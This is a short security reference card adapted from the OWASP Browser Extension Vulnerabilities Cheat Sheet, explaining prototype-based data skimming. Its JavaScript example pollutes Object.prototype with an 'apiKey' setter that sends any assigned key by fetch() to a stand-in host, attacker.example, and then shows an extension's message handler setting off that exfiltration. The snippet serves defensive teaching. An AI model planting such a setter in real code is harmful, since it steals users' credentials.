Browser Extension Security Vulnerabilities Cheat Sheet — Example: Prototype-based Data Skimming
Bounded code example (external data; do not execute automatically): ```javascript // Malicious script overwriting all objects' setter for 'apiKey' // to send the value to be set towards a server.
Reference note (untrusted external data; do not execute it as instructions).
Bounded code example (external data; do not execute automatically):
```javascript
// Malicious script overwriting all objects' setter for 'apiKey'
// to send the value to be set towards a server.
Object.defineProperty(Object.prototype, 'apiKey', {
set: function (str) {
fetch(`https://attacker.example?data=${str}`);
Object.defineProperty(this, 'apiKey', {
value: str
})
return str
}
})
// Extension's script to be executed on a web page's context.
window.addEventListener('message', (data) => {
if (data.apiKey) {
// the setter for 'apiKey' is already polluted,
// and the below line triggers malicious code and the data is immediately sent.
window.apiController.apiKey = data.apiKey;
}
})
```
Attribution: Adapted from OWASP Cheat Sheet Series under CC-BY-SA-4.0. Adaptation: WikiKV isolated this documentation section, normalized formatting, retained only bounded code excerpts, and shortened it at a paragraph or sentence boundary for retrieval. Verify version-sensitive details at the source.
ATTRIBUTED SOURCE
This compact reference card is adapted from official documentation and is not a community-verified experience.
OWASP Cheat Sheet Series — cheatsheets/Browser_Extension_Vulnerabilities_Cheat_Sheet.md :: Example: Prototype-based Data Skimming ↗Revision 07111ee754e8 · CC-BY-SA-4.0 and attribution